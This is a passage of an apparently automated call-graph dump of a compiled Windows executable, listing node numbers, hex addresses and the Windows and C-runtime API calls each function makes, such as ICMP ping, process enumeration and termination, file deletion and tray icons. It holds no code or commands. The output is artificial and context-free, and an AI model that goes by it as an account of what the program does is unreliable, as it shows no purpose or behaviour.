102810 db9f47 102810->102812 102977 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102810->102977 102812->102737 102830 db0376 messages 102813->102830 102814 df632b 102982 e13fe1 81 API calls __wsopen_s 102814->102982 102815 db1e50 40 API calls 102815->102830 102816 db1695 102824 dabed9 8 API calls 102816->102824 102829 db049d messages 102816->102829 102817 dc014b 8 API calls 102817->102830 102819 df625a 102981 e13fe1 81 API calls __wsopen_s 102819->102981 102820 dabed9 8 API calls 102820->102830 102821 df5cdb 102826 dabed9 8 API calls 102821->102826 102821->102829 102824->102829 102826->102829 102827 dc05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102827->102830 102828 dabf73 8 API calls 102828->102830 102829->102758 102830->102814 102830->102815 102830->102816 102830->102817 102830->102819 102830->102820 102830->102821 102830->102827 102830->102828 102830->102829 102831 dc0413 29 API calls pre_c_initialization 102830->102831 102832 df6115 102830->102832 102833 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102830->102833 102835 db0aae messages 102830->102835 102978 db1990 207 API calls 2 library calls 102830->102978 102831->102830 102979 e13fe1 81 API calls __wsopen_s 102832->102979 102833->102830 102980 e13fe1 81 API calls __wsopen_s 102835->102980 102837 dc017b 8 API calls 102836->102837 102838 e1f95b 102837->102838 102839 da423c 8 API calls 102838->102839 102840 e1f965 102839->102840 102983 da8ec0 102840->102983 102844 e1f999 messages 102844->102774 102846 e20fe1 102845->102846 102847 e2100f WSAStartup 102846->102847 103024 dac98d 102846->103024 102849 e21054 102847->102849 102869 e21023 messages 102847->102869 103011 dbc1f6 102849->103011 102852 e20ffc 102852->102847 102854 dac98d 39 API calls 102852->102854 102853 da8ec0 52 API calls 102855 e21069 102853->102855 102856 e2100b 102854->102856 103016 dbf9d4 WideCharToMultiByte 102855->103016 102856->102847 102858 e21075 inet_addr gethostbyname 102859 e21093 IcmpCreateFile 102858->102859 102858->102869 102860 e210d3 102859->102860 102859->102869 102861 dc017b 8 API calls 102860->102861 102862 e210ec 102861->102862 102863 da423c 8 API calls 102862->102863 102864 e210f7 102863->102864 102865 e21102 IcmpSendEcho 102864->102865 102866 e2112b IcmpSendEcho 102864->102866 102867 e2114c 102865->102867 102866->102867 102868 e21212 IcmpCloseHandle WSACleanup 102867->102868 102868->102869 102869->102774 103032 e289b6 102870->103032 102872 e2a00c 102872->102774 102874 da8ec0 52 API calls 102873->102874 102875 e16662 102874->102875 103157 e0dc54 102875->103157 102877 e1666a 102878 e1666e GetLastError 102877->102878 102879 e16683 102877->102879 102878->102879 102879->102774 102881 e2a5c5 102880->102881 102882 da8ec0 52 API calls 102881->102882 102885 e2a5d4 102881->102885 102883 e2a632 102882->102883 103249 e118a9 102883->103249 102885->102774 102887 da8ec0 52 API calls 102886->102887 102888 dbac68 102887->102888 103290 dbbc58 102888->103290 102890 dbac7f 102891 dac98d 39 API calls 102890->102891 102893 dbb09b _wcslen 102890->102893 102891->102893 102892 dbbbbe 43 API calls 102892->102893 102893->102892 102898 da6c03 8 API calls 102893->102898 102899 dbb1fb 102893->102899 102900 da8ec0 52 API calls 102893->102900 102901 da8577 8 API calls 102893->102901 102904 dac98d 39 API calls 102893->102904 103295 da396b 102893->103295 103305 da3907 102893->103305 103309 dc4d98 102893->103309 103319 da7ad5 102893->103319 103324 daad40 8 API calls __fread_nolock 102893->103324 103325 da7b1a 8 API calls 102893->103325 102898->102893 102899->102774 102900->102893 102901->102893 102904->102893 102906 da8ec0 52 API calls 102905->102906 102907 e2ad63 102906->102907 103366 e0dd87 CreateToolhelp32Snapshot Process32FirstW 102907->103366 102909 e2ad72 102909->102774 102911 e2a705 102910->102911 102917 e2a6c5 102910->102917 102912 e2a723 102911->102912 102914 dac98d 39 API calls 102911->102914 102913 dac98d 39 API calls 102912->102913 102915 e2a780 102912->102915 102912->102917 102913->102915 102914->102912 103385 e10372 102915->103385 102917->102774 102919 dac98d 39 API calls 102918->102919 102920 e2186c 102919->102920 102921 dac98d 39 API calls 102920->102921 102923 e218a9 102920->102923 102921->102923 102922 e218cc 102922->102774 102923->102922 102924 dab4c8 8 API calls 102923->102924 102924->102922 102926 e289b6 119 API calls 102925->102926 102927 e29ff8 102926->102927 102927->102774 102929 e27b52 102928->102929 102930 e27b38 102928->102930 103443 e260e6 102929->103443 103454 e13fe1 81 API calls __wsopen_s 102930->103454 102934 db0340 206 API calls 102935 e27bc1 102934->102935 102936 e27c5c 102935->102936 102940 e27c03 102935->102940 102950 e27b4a 102935->102950 102937 e27c62 102936->102937 102938 e27cb0 102936->102938 103455 e11ad8 8 API calls 102937->103455 102939 da8ec0 52 API calls 102938->102939 102938->102950 102941 e27cc2 102939->102941 102945 e1148b 8 API calls 102940->102945 102943 dac2c9 8 API calls 102941->102943 102946 e27ce6 CharUpperBuffW 102943->102946 102944 e27c85 103456 dabd07 8 API calls 102944->103456 102948 e27c3b 102945->102948 102951 e27d00 102946->102951 102949 db2b20 206 API calls 102948->102949 102949->102950 102950->102735 102952 e27d53 102951->102952 102953 e27d07 102951->102953 102954 da8ec0 52 API calls 102952->102954 103450 e1148b 102953->103450 102955 e27d5b 102954->102955 103457 dbaa65 9 API calls 102955->103457 102958 e27d65 102958->102950 102961 da8ec0 52 API calls 102958->102961 102960 db2b20 206 API calls 102960->102950 102962 e27d80 102961->102962 103458 dabd07 8 API calls 102962->103458 102964->102770 102965->102733 102966->102743 102967->102752 102968->102752 102969->102774 102970->102774 102971->102774 102972->102771 102973->102774 102974->102807 102975->102804 102976->102810 102977->102812 102978->102830 102979->102835 102980->102829 102981->102829 102982->102829 102984 da8ed2 GetEnvironmentVariableW 102983->102984 102985 da8ed5 102983->102985 103006 e1160f 8 API calls 102984->103006 102986 da8f0b 102985->102986 102987 da8edd 102985->102987 102989 de6b1f 102986->102989 102992 da8f1d 102986->102992 102998 de6a38 102986->102998 103007 dc5536 26 API calls 102987->103007 103010 dc54f3 26 API calls 102989->103010 102990 da8eed 102997 dc014b 8 API calls 102990->102997 103008 dbfe6f 51 API calls 102992->103008 102993 de6ab1 103009 dbfe6f 51 API calls 102993->103009 102994 de6b37 102994->102994 102999 da8ef7 102997->102999 102998->102993 103001 dc017b 8 API calls 102998->103001 103000 dab329 8 API calls 102999->103000 103000->102984 103002 de6a81 103001->103002 103003 dc014b 8 API calls 103002->103003 103004 de6aa8 103003->103004 103005 dab329 8 API calls 103004->103005 103005->102993 103006->102844 103007->102990 103008->102990 103009->102989 103010->102994 103012 dc017b 8 API calls 103011->103012 103013 dbc209 103012->103013 103014 dc014b 8 API calls 103013->103014 103015 dbc215 103014->103015 103015->102853 103017 dbf9fe 103016->103017 103018 dbfa35 103016->103018 103020 dc017b 8 API calls 103017->103020 103030 dbfe8a 8 API calls 103018->103030 103021 dbfa05 WideCharToMultiByte 103020->103021 103029 dbfa3e 8 API calls __fread_nolock 103021->103029 103023 dbfa29 103023->102858 103025 dac9a5 103024->103025 103026 dac99e 103024->103026 103025->102852 103026->103025 103031 dc6641 39 API calls _strftime 103026->103031 103028 dac9e8 103028->102852 103029->103023 103030->103023 103031->103028 103033 da8ec0 52 API calls 103032->103033 103034 e289ed 103033->103034 103057 e28a32 messages 103034->103057 103070 e29730 103034->103070 103036 e28cde 103037 e28eac 103036->103037 103043 e28cec 103036->103043 103119 e29941 59 API calls 103037->103119 103040 e28ebb 103042 e28ec7 103040->103042 103040->103043 103041 da8ec0 52 API calls 103060 e28aa6 103041->103060 103042->103057 103083 e288e3 103043->103083 103048 e28d25 103097 dbffe0 103048->103097 103051 e28d45 103104 e13fe1 81 API calls __wsopen_s 103051->103104 103052 e28d5f 103105 da7e12 103052->103105 103055 e28d50 GetCurrentProcess TerminateProcess 103055->103052 103057->102872 103060->103036 103060->103041 103060->103057 103102 e04ad3 8 API calls __fread_nolock 103060->103102 103103 e28f7a 41 API calls _strftime 103060->103103 103061 e28f22 103061->103057 103066 e28f36 FreeLibrary 103061->103066 103063 e28d9e 103117 e295d8 74 API calls 103063->103117 103066->103057 103068 e28daf 103068->103061 103069 dab4c8 8 API calls 103068->103069 103118 db1ca0 8 API calls 103068->103118 103120 e295d8 74 API calls 103068->103120 103069->103068 103071 dac2c9 8 API calls 103070->103071 103072 e2974b CharLowerBuffW 103071->103072 103121 e09805 103072->103121 103076 dabf73 8 API calls 103077 e29787 103076->103077 103128 daacc0 103077->103128 103079 e2979b 103080 daadf4 8 API calls 103079->103080 103082 e297a5 _wcslen 103080->103082 103081 e298bb _wcslen 103081->103060 103082->103081 103140 e28f7a 41 API calls _strftime 103082->103140 103084 e28949 103083->103084 103085 e288fe 103083->103085 103089 e29af3 103084->103089 103086 dc017b 8 API calls 103085->103086 103087 e28920 103086->103087 103087->103084 103088 dc014b 8 API calls 103087->103088 103088->103087 103090 e29d08 messages 103089->103090 103095 e29b17 _strcat _wcslen ___std_exception_copy 103089->103095 103090->103048 103091 dac98d 39 API calls 103091->103095 103092 dac63f 39 API calls 103092->103095 103093 daca5b 39 API calls 103093->103095 103094 da8ec0 52 API calls 103094->103095 103095->103090 103095->103091 103095->103092 103095->103093 103095->103094 103144 e0f8c5 10 API calls _wcslen 103095->103144 103100 dbfff5 103097->103100 103098 dc008d Sleep 103099 dc005b 103098->103099 103099->103051 103099->103052 103100->103098 103100->103099 103101 dc007b CloseHandle 103100->103101 103101->103099 103102->103060 103103->103060 103104->103055 103106 da7e1a 103105->103106 103107 dc014b 8 API calls 103106->103107 103108 da7e28 103107->103108 103145 da8445 103108->103145 103111 da8470 103148 dac760 103111->103148 103113 da8480 103114 dc017b 8 API calls 103113->103114 103115 da851c 103113->103115 103114->103115 103115->103068 103116 db1ca0 8 API calls 103115->103116 103116->103063 103117->103068 103118->103068 103119->103040 103120->103068 103123 e09825 _wcslen 103121->103123 103122 e09914 103122->103076 103122->103082 103123->103122 103124 e09919 103123->103124 103125 e0985a 103123->103125 103124->103122 103142 dbe36b 41 API calls 103124->103142 103125->103122 103141 dbe36b 41 API calls 103125->103141 103131 daace1 103128->103131 103139 daaccf 103128->103139 103129 daacda __fread_nolock 103129->103079 103130 dac2c9 8 API calls 103136 df05a3 __fread_nolock 103130->103136 103132 df0557 103131->103132 103133 daad07 103131->103133 103131->103139 103134 dc014b 8 API calls 103132->103134 103143 da88e8 8 API calls 103133->103143 103137 df0561 103134->103137 103138 dc017b 8 API calls 103137->103138 103138->103139 103139->103129 103139->103130 103140->103081 103141->103125 103142->103124 103143->103129 103144->103095 103146 dc014b 8 API calls 103145->103146 103147 da7e30 103146->103147 103147->103111 103149 dac76b 103148->103149 103150 df1285 103149->103150 103155 dac773 messages 103149->103155 103151 dc014b 8 API calls 103150->103151 103153 df1291 103151->103153 103152 dac77a 103152->103113 103155->103152 103156 dac7e0 8 API calls messages 103155->103156 103156->103155 103158 dabf73 8 API calls 103157->103158 103159 e0dc73 103158->103159 103160 dabf73 8 API calls 103159->103160 103161 e0dc7c 103160->103161 103162 dabf73 8 API calls 103161->103162 103163 e0dc85 103162->103163 103164 da5851 9 API calls 103163->103164 103165 e0dc90 103164->103165 103181 e0eab0 GetFileAttributesW 103165->103181 103168 e0dcab 103183 da568e 103168->103183 103169 da6b7c 8 API calls 103169->103168 103171 e0dcbf FindFirstFileW 103172 e0dd4b FindClose 103171->103172 103175 e0dcde 103171->103175 103177 e0dd56 103172->103177 103173 e0dd26 FindNextFileW 103173->103175 103174 dabed9 8 API calls 103174->103175 103175->103172 103175->103173 103175->103174 103178 da6b7c 8 API calls 103175->103178 103225 da7bb5 103175->103225 103177->102877 103179 e0dd17 DeleteFileW 103178->103179 103179->103173 103180 e0dd42 FindClose 103179->103180 103180->103177 103182 e0dc99 103181->103182 103182->103168 103182->103169 103184 dabf73 8 API calls 103183->103184 103185 da56a4 103184->103185 103186 dabf73 8 API calls 103185->103186 103187 da56ac 103186->103187 103188 dabf73 8 API calls 103187->103188 103189 da56b4 103188->103189 103190 dabf73 8 API calls 103189->103190 103191 da56bc 103190->103191 103192 da56f0 103191->103192 103193 de4da1 103191->103193 103195 daacc0 8 API calls 103192->103195 103194 dabed9 8 API calls 103193->103194 103196 de4daa 103194->103196 103197 da56fe 103195->103197 103198 dabd57 8 API calls 103196->103198 103199 daadf4 8 API calls 103197->103199 103202 da5733 103198->103202 103200 da5708 103199->103200 103201 daacc0 8 API calls 103200->103201 103200->103202 103205 da5729 103201->103205 103203 da5754 103202->103203 103217 da5778 103202->103217 103224 de4dcc 103202->103224 103203->103217 103234 da655e 103203->103234 103204 daacc0 8 API calls 103206 da5789 103204->103206 103207 daadf4 8 API calls 103205->103207 103211 dabed9 8 API calls 103206->103211 103212 da579f 103206->103212 103207->103202 103210 da8577 8 API calls 103221 de4e8c 103210->103221 103211->103212 103214 da57b3 103212->103214 103215 dabed9 8 API calls 103212->103215 103213 da57be 103219 dabed9 8 API calls 103213->103219 103222 da57c9 103213->103222 103214->103213 103218 dabed9 8 API calls 103214->103218 103215->103214 103216 daacc0 8 API calls 103216->103217 103217->103204 103218->103213 103219->103222 103220 da655e 8 API calls 103220->103221 103221->103217 103221->103220 103237 daad40 8 API calls __fread_nolock 103221->103237 103222->103171 103224->103210 103226 de641d 103225->103226 103227 da7bc7 103225->103227 103248 e013c8 8 API calls __fread_nolock 103226->103248 103238 da7bd8 103227->103238 103230 da7bd3 103230->103175 103231 de6427 103232 de6433 103231->103232 103233 dabed9 8 API calls 103231->103233 103233->103232 103235 dac2c9 8 API calls 103234->103235 103236 da5761 103235->103236 103236->103216 103236->103217 103237->103221 103239 da7be7 103238->103239 103245 da7c1b __fread_nolock 103238->103245 103240 de644e 103239->103240 103241 da7c0e 103239->103241 103239->103245 103242 dc014b 8 API calls 103240->103242 103243 da7d74 8 API calls 103241->103243 103244 de645d 103242->103244 103243->103245 103246 dc017b 8 API calls 103244->103246 103245->103230 103247 de6491 __fread_nolock 103246->103247 103248->103231 103250 e118b6 103249->103250 103251 dc014b 8 API calls 103250->103251 103252 e118bd 103251->103252 103255 e0fcb5 103252->103255 103254 e118f7 103254->102885 103256 dac2c9 8 API calls 103255->103256 103257 e0fcc8 CharLowerBuffW 103256->103257 103262 e0fcdb 103257->103262 103258 e0fce5 ___scrt_fastfail 103258->103254 103259 e0fd19 103261 e0fd2b 103259->103261 103263 da655e 8 API calls 103259->103263 103260 da655e 8 API calls 103260->103262 103264 dc017b 8 API calls 103261->103264 103262->103258 103262->103259 103262->103260 103263->103261 103265 e0fd59 103264->103265 103266 e0fd7b 103265->103266 103288 e0fbed 8 API calls 103265->103288 103273 e0fe0c 103266->103273 103269 e0fdb8 103269->103258 103270 dc014b 8 API calls 103269->103270 103271 e0fdd2 103270->103271 103272 dc017b 8 API calls 103271->103272 103272->103258 103274 dabf73 8 API calls 103273->103274 103275 e0fe3e 103274->103275 103276 dabf73 8 API calls 103275->103276 103277 e0fe47 103276->103277 103278 dabf73 8 API calls 103277->103278 103280 e0fe50 103278->103280 103279 e10114 103279->103269 103280->103279 103281 da8577 8 API calls 103280->103281 103282 dc66f8 GetStringTypeW 103280->103282 103283 daad40 8 API calls 103280->103283 103285 dc6641 39 API calls 103280->103285 103286 e0fe0c 40 API calls 103280->103286 103287 dabed9 8 API calls 103280->103287 103289 dc6722 GetStringTypeW _strftime 103280->103289 103281->103280 103282->103280 103283->103280 103285->103280 103286->103280 103287->103280 103288->103265 103289->103280 103291 dc014b 8 API calls 103290->103291 103292 dbbc65 103291->103292 103293 dab329 8 API calls 103292->103293 103294 dbbc70 103293->103294 103294->102890 103296 da3996 ___scrt_fastfail 103295->103296 103326 da5f32 103296->103326 103299 da3a1c 103301 da3a3a Shell_NotifyIconW 103299->103301 103302 de40cd Shell_NotifyIconW 103299->103302 103330 da61a9 103301->103330 103304 da3a50 103304->102893 103306 da3969 103305->103306 103307 da3919 ___scrt_fastfail 103305->103307 103306->102893 103308 da3938 Shell_NotifyIconW 103307->103308 103308->103306 103310 dc4e1b 103309->103310 103311 dc4da6 103309->103311 103365 dc4e2d 40 API calls 4 library calls 103310->103365 103318 dc4dcb 103311->103318 103363 dcf649 20 API calls __dosmaperr 103311->103363 103313 dc4e28 103313->102893 103315 dc4db2 103364 dd2b5c 26 API calls __wsopen_s 103315->103364 103317 dc4dbd 103317->102893 103318->102893 103320 dc017b 8 API calls 103319->103320 103321 da7afa 103320->103321 103322 dc014b 8 API calls 103321->103322 103323 da7b08 103322->103323 103323->102893 103324->102893 103325->102893 103327 da39eb 103326->103327 103328 da5f4e 103326->103328 103327->103299 103360 e0d11f 42 API calls _strftime 103327->103360 103328->103327 103329 de5070 DestroyIcon 103328->103329 103329->103327 103331 da62a8 103330->103331 103332 da61c6 103330->103332 103331->103304 103333 da7ad5 8 API calls 103332->103333 103334 da61d4 103333->103334 103335 de5278 LoadStringW 103334->103335 103336 da61e1 103334->103336 103339 de5292 103335->103339 103337 da8577 8 API calls 103336->103337 103338 da61f6 103337->103338 103340 da6203 103338->103340 103347 de52ae 103338->103347 103342 dabed9 8 API calls 103339->103342 103346 da6229 ___scrt_fastfail 103339->103346 103340->103339 103341 da620d 103340->103341 103343 da6b7c 8 API calls 103341->103343 103342->103346 103344 da621b 103343->103344 103345 da7bb5 8 API calls 103344->103345 103345->103346 103349 da628e Shell_NotifyIconW 103346->103349 103347->103346 103348 de52f1 103347->103348 103350 dabf73 8 API calls 103347->103350 103362 dbfe6f 51 API calls 103348->103362 103349->103331 103351 de52d8 103350->103351 103361 e0a350 9 API calls 103351->103361 103354 de5310 103356 da6b7c 8 API calls 103354->103356 103355 de52e3 103357 da7bb5 8 API calls 103355->103357 103358 de5321 103356->103358 103357->103348 103359 da6b7c 8 API calls 103358->103359 103359->103346 103360->103299 103361->103355 103362->103354 103363->103315 103364->103317 103365->103313 103376 e0e80e 103366->103376 103368 e0ddd4 Process32NextW 103369 e0de86 CloseHandle 103368->103369 103375 e0ddcd 103368->103375 103369->102909 103370 dabf73 8 API calls 103370->103375 103371 dab329 8 API calls 103371->103375 103372 da568e 8 API calls 103372->103375 103373 da7bb5 8 API calls 103373->103375 103375->103368 103375->103369 103375->103370 103375->103371 103375->103372 103375->103373 103382 dbe36b 41 API calls 103375->103382 103380 e0e819 103376->103380 103377 e0e830 103384 dc666b 39 API calls _strftime 103377->103384 103380->103377 103381 e0e836 103380->103381 103383 dc6722 GetStringTypeW _strftime 103380->103383 103381->103375 103382->103375 103383->103380 103384->103381 103417 e102aa 103385->103417 103388 e103f3 103433 e105e9 56 API calls __fread_nolock 103388->103433 103389 e1040b 103391 e10471 103389->103391 103395 e1041b 103389->103395 103392 e10399 __fread_nolock 103391->103392 103393 e104a1 103391->103393 103394 e10507 103391->103394 103392->102917 103396 e104d1 103393->103396 103397 e104a6 103393->103397 103398 e105b0 103394->103398 103399 e10510 103394->103399 103416 e10453 103395->103416 103434 e12855 10 API calls 103395->103434 103396->103392 103438 daca5b 39 API calls 103396->103438 103397->103392 103437 daca5b 39 API calls 103397->103437 103398->103392 103442 dac63f 39 API calls 103398->103442 103400 e10515 103399->103400 103401 e1058d 103399->103401 103407 e1051b 103400->103407 103408 e10554 103400->103408 103401->103392 103441 dac63f 39 API calls 103401->103441 103407->103392 103439 dac63f 39 API calls 103407->103439 103408->103392 103440 dac63f 39 API calls 103408->103440 103410 e10427 103435 e12855 10 API calls 103410->103435 103414 e1043e __fread_nolock 103436 e12855 10 API calls 103414->103436 103424 e11844 103416->103424 103418 e102f7 103417->103418 103421 e102bb 103417->103421 103419 dac98d 39 API calls 103418->103419 103422 e102f5 103419->103422 103420 da8ec0 52 API calls 103420->103421 103421->103420 103421->103422 103423 dc4d98 _strftime 40 API calls 103421->103423 103422->103388 103422->103389 103422->103392 103423->103421 103425 e1184f 103424->103425 103426 dc014b 8 API calls 103425->103426 103427 e11856 103426->103427 103428 e11883 103427->103428 103429 e11862 103427->103429 103431 dc017b 8 API calls 103428->103431 103430 dc017b 8 API calls 103429->103430 103432 e1186b ___scrt_fastfail 103430->103432 103431->103432 103432->103392 103433->103392 103434->103410 103435->103414 103436->103416 103437->103392 103438->103392 103439->103392 103440->103392 103441->103392 103442->103392 103444 e26101 103443->103444 103449 e2614f 103443->103449 103445 dc017b 8 API calls 103444->103445 103447 e26123 103445->103447 103446 dc014b 8 API calls 103446->103447 103447->103446 103447->103449 103459 e11400 8 API calls 103447->103459 103449->102934 103451 e114d2 103450->103451 103452 e11499 103450->103452 103451->102960 103452->103451 103453 dc014b 8 API calls 103452->103453 103453->103451 103454->102950 103455->102944 103456->102950 103457->102958 103458->102950 103459->103447 103460 daf4dc 103463 dacab0 103460->103463 103464 dacacb 103463->103464 103465 df14be 103464->103465 103466 df150c 103464->103466 103493 dacaf0 103464->103493 103469 df14c8 103465->103469 103471 df14d5 103465->103471 103465->103493 103507 e262ff 207 API calls 2 library calls 103466->103507 103505 e26790 207 API calls 103469->103505 103489 dacdc0 103471->103489 103506 e26c2d 207 API calls 2 library calls 103471->103506 103472 dbbc58 8 API calls 103472->103493 103476 df179f 103476->103476 103478 dbe807 39 API calls 103478->103493 103479 dacdee 103481 df16e8 103509 e26669 81 API calls 103481->103509 103487 dab4c8 8 API calls 103487->103493 103488 dacf80 39 API calls 103488->103493 103489->103479 103510 e13fe1 81 API calls __wsopen_s 103489->103510 103490 db0340 207 API calls 103490->103493 103491 dabed9 8 API calls 103491->103493 103493->103472 103493->103478 103493->103479 103493->103481 103493->103487 103493->103488 103493->103489 103493->103490 103493->103491 103494 dabe2d 103493->103494 103498 dbe7c1 39 API calls 103493->103498 103499 dbaa99 207 API calls 103493->103499 103500 dc05b2 5 API calls __Init_thread_wait 103493->103500 103501 dc0413 29 API calls __onexit 103493->103501 103502 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103493->103502 103503 dbf4df 81 API calls 103493->103503 103504 dbf346 207 API calls 103493->103504 103508 dfffaf 8 API calls 103493->103508 103495 dabe38 103494->103495 103496 dabe67 103495->103496 103511 dabfa5 103495->103511 103496->103493 103498->103493 103499->103493 103500->103493 103501->103493 103502->103493 103503->103493 103504->103493 103505->103471 103506->103489 103507->103493 103508->103493 103509->103489 103510->103476 103528 dacf80 103511->103528 103513 dabfb5 103514 df0db6 103513->103514 103515 dabfc3 103513->103515 103516 dab4c8 8 API calls 103514->103516 103517 dc014b 8 API calls 103515->103517 103519 df0dc1 103516->103519 103518 dabfd4 103517->103518 103520 dabf73 8 API calls 103518->103520 103522 dabfde 103520->103522 103521 dabfed 103524 dc014b 8 API calls 103521->103524 103522->103521 103523 dabed9 8 API calls 103522->103523 103523->103521 103525 dabff7 103524->103525 103536 dabe7b 39 API calls 103525->103536 103527 dac01b 103527->103496 103529 dad1c7 103528->103529 103534 dacf93 103528->103534 103529->103513 103531 dabf73 8 API calls 103531->103534 103532 dad03d 103532->103513 103534->103531 103534->103532 103537 dc05b2 5 API calls __Init_thread_wait 103534->103537 103538 dc0413 29 API calls __onexit 103534->103538 103539 dc0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103534->103539 103536->103527 103537->103534 103538->103534 103539->103534 103540 dd947a 103541 dd9487 103540->103541 103545 dd949f 103540->103545 103597 dcf649 20 API calls __dosmaperr 103541->103597 103543 dd948c 103598 dd2b5c 26 API calls __wsopen_s 103543->103598 103546 dd94fa 103545->103546 103554 dd9497 103545->103554 103599 de0144 21 API calls 2 library calls 103545->103599 103560 dcdcc5 103546->103560 103549 dd9512 103567 dd8fb2 103549->103567 103551 dd9519 103552 dcdcc5 __fread_nolock 26 API calls 103551->103552 103551->103554 103553 dd9545 103552->103553 103553->103554 103555 dcdcc5 __fread_nolock 26 API calls 103553->103555 103556 dd9553 103555->103556 103556->103554 103557 dcdcc5 __fread_nolock 26 API calls 103556->103557 103558 dd9563 103557->103558 103559 dcdcc5 __fread_nolock 26 API calls 103558->103559 103559->103554 103561 dcdce6 103560->103561 103562 dcdcd1 103560->103562 103561->103549 103600 dcf649 20 API calls __dosmaperr 103562->103600 103564 dcdcd6 103601 dd2b5c 26 API calls __wsopen_s 103564->103601 103566 dcdce1 103566->103549 103568 dd8fbe CallCatchBlock 103567->103568 103569 dd8fde 103568->103569 103570 dd8fc6 103568->103570 103572 dd90a4 103569->103572 103576 dd9017 103569->103576 103668 dcf636 20 API calls __dosmaperr 103570->103668 103675 dcf636 20 API calls __dosmaperr 103572->103675 103573 dd8fcb 103669 dcf649 20 API calls __dosmaperr 103573->103669 103580 dd903b 103576->103580 103581 dd9026 103576->103581 103577 dd90a9 103676 dcf649 20 API calls __dosmaperr 103577->103676 103579 dd8fd3 __wsopen_s 103579->103551 103602 dd54ba EnterCriticalSection 103580->103602 103670 dcf636 20 API calls __dosmaperr 103581->103670 103584 dd9041 103586 dd905d 103584->103586 103587 dd9072 103584->103587 103585 dd902b 103671 dcf649 20 API calls __dosmaperr 103585->103671 103672 dcf649 20 API calls __dosmaperr 103586->103672 103603 dd90c5 103587->103603 103592 dd9033 103677 dd2b5c 26 API calls __wsopen_s 103592->103677 103593 dd9062 103673 dcf636 20 API calls __dosmaperr 103593->103673 103594 dd906d 103674 dd909c LeaveCriticalSection __wsopen_s 103594->103674 103597->103543 103598->103554 103599->103546 103600->103564 103601->103566 103602->103584 103604 dd90ef 103603->103604 103605 dd90d7 103603->103605 103606 dd9459 103604->103606 103610 dd9134 103604->103610 103694 dcf636 20 API calls __dosmaperr 103605->103694 103717 dcf636 20 API calls __dosmaperr 103606->103717 103608 dd90dc 103695 dcf649 20 API calls __dosmaperr 103608->103695 103613 dd913f 103610->103613 103617 dd90e4 103610->103617 103621 dd916f 103610->103621 103612 dd945e 103718 dcf649 20 API calls __dosmaperr 103612->103718 103696 dcf636 20 API calls __dosmaperr 103613->103696 103615 dd914c 103719 dd2b5c 26 API calls __wsopen_s 103615->103719 103617->103594 103618 dd9144 103697 dcf649 20 API calls __dosmaperr 103618->103697 103622 dd9188 103621->103622 103623 dd91ae 103621->103623 103624 dd91ca 103621->103624 103622->103623 103630 dd9195 103622->103630 103698 dcf636 20 API calls __dosmaperr 103623->103698 103678 dd3b93 103624->103678 103626 dd91b3 103699 dcf649 20 API calls __dosmaperr 103626->103699 103685 ddfc1b 103630->103685 103632 dd91ba 103700 dd2b5c 26 API calls __wsopen_s 103632->103700 103633 dd9333 103636 dd93a9 103633->103636 103640 dd934c GetConsoleMode 103633->103640 103638 dd93ad ReadFile 103636->103638 103637 dd91ea 103641 dd2d38 _free 20 API calls 103637->103641 103642 dd93c7 103638->103642 103643 dd9421 GetLastError 103638->103643 103639 dd91c5 __fread_nolock 103656 dd2d38 _free 20 API calls 103639->103656 103640->103636 103644 dd935d 103640->103644 103645 dd91f1 103641->103645 103642->103643 103650 dd939e 103642->103650 103648 dd942e 103643->103648 103649 dd9385 103643->103649 103644->103638 103651 dd9363 ReadConsoleW 103644->103651 103646 dd91fb 103645->103646 103647 dd9216 103645->103647 103707 dcf649 20 API calls __dosmaperr 103646->103707 103709 dd97a4 103647->103709 103715 dcf649 20 API calls __dosmaperr 103648->103715 103649->103639 103712 dcf613 20 API calls __dosmaperr 103649->103712 103650->103639 103662 dd93ec 103650->103662 103663 dd9403 103650->103663 103651->103650 103655 dd937f GetLastError 103651->103655 103655->103649 103656->103617 103657 dd9200 103708 dcf636 20 API calls __dosmaperr 103657->103708 103658 dd9433 103716 dcf636 20 API calls __dosmaperr 103658->103716 103713 dd8de1 31 API calls 3 library calls 103662->103713 103663->103639 103665 dd941a 103663->103665 103714 dd8c21 29 API calls __wsopen_s 103665->103714 103667 dd941f 103667->103639 103668->103573 103669->103579 103670->103585 103671->103592 103672->103593 103673->103594 103674->103579 103675->103577 103676->103592 103677->103579 103679 dd3bd1 103678->103679 103683 dd3ba1 __dosmaperr 103678->103683 103721 dcf649 20 API calls __dosmaperr 103679->103721 103681 dd3bbc RtlAllocateHeap 103682 dd3bcf 103681->103682 103681->103683 103701 dd2d38 103682->103701 103683->103679 103683->103681 103720 dc521d 7 API calls 2 library calls 103683->103720 103686 ddfc28 103685->103686 103687 ddfc35 103685->103687 103722 dcf649 20 API calls __dosmaperr 103686->103722 103689 ddfc41 103687->103689 103723 dcf649 20 API calls __dosmaperr 103687->103723 103689->103633 103691 ddfc2d 103691->103633 103692 ddfc62 103724 dd2b5c 26 API calls __wsopen_s 103692->103724 103694->103608 103695->103617 103696->103618 103697->103615 103698->103626 103699->103632 103700->103639 103702 dd2d6c __dosmaperr 103701->103702 103703 dd2d43 RtlFreeHeap 103701->103703 103702->103637 103703->103702 103704 dd2d58 103703->103704 103725 dcf649 20 API calls __dosmaperr 103704->103725 103706 dd2d5e GetLastError 103706->103702 103707->103657 103708->103639 103726 dd970b 103709->103726 103712->103639 103713->103639 103714->103667 103715->103658 103716->103639 103717->103612 103718->103615 103719->103617 103720->103683 103721->103682 103722->103691 103723->103692 103724->103691 103725->103706 103735 dd5737 103726->103735 103728 dd971d 103729 dd9725 103728->103729 103730 dd9736 SetFilePointerEx 103728->103730 103748 dcf649 20 API calls __dosmaperr 103729->103748 103732 dd974e GetLastError 103730->103732 103734 dd972a 103730->103734 103749 dcf613 20 API calls __dosmaperr 103732->103749 103734->103630 103736 dd5759 103735->103736 103737 dd5744 103735->103737 103742 dd577e 103736->103742 103752 dcf636 20 API calls __dosmaperr 103736->103752 103750 dcf636 20 API calls __dosmaperr 103737->103750 103739 dd5749 103751 dcf649 20 API calls __dosmaperr 103739->103751 103742->103728 103743 dd5789 103753 dcf649 20 API calls __dosmaperr 103743->103753 103744 dd5751 103744->103728 103746 dd5791 103754 dd2b5c 26 API calls __wsopen_s 103746->103754 103748->103734 103749->103734 103750->103739 103751->103744 103752->103743 103753->103746 103754->103744 103755 db235c 103765 